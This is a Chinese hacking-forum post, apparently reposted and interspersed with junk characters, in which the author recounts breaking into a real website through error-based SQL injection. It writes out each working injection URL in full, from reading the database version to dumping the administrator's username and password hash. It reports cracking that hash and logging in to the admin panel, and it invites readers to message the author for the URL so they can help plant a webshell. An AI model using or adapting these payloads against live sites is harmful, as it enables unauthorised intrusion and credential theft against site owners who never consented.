近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。
2 Z2 L$ T* z" M5 P- t) D; }4 q首先找到网站后台,加了个admin,后台出来了
/ l4 o5 ?) x1 F9 g$ z6 q9 k/ C, D/ A$ [0 s
" {5 L/ ?; Z. W8 J+ Y9 o: C然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
7 S b' w0 M7 y/ w8 rhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—% _& H' t3 p2 U' ^, Q! l
, ~1 B h2 |& V2 [% u
7 B# P$ g* X3 S" ^* I& j, s X* ]/ ~) ]- ~
$ Z3 m* E* N; Phttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg* u W7 }# ?# N$ i s" T
- _$ @3 [ X; V' W- j
- ?% t' _% O2 o# J: u/ A
$ s5 W, \8 @- Y3 _) }6 v/ D9 i4 |! k
可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator
! Q8 K# f- T0 @8 a1 l$ m7 L
' f% o! N4 z' l; v0 o8 ~
: [+ z+ [4 H8 y Qhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg) s" Y# l3 E) p
2 I/ h. x7 V4 T
8 S7 A+ O# N* h 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--+ }# @4 Z& z4 i
" ~$ h; z- ?9 G$ ]$ W2 Y3 t6 N H8 J4 i7 w8 O1 M+ U
3 a8 z: I1 o4 q; h4 _( X% E+ [
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))-- D8 k& s( E3 Q# o' e
+ i' t2 H2 O: b; D$ ?2 P$ r' V; {; I" b! e6 b
/ ?, X% X+ k, `- }" Q
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |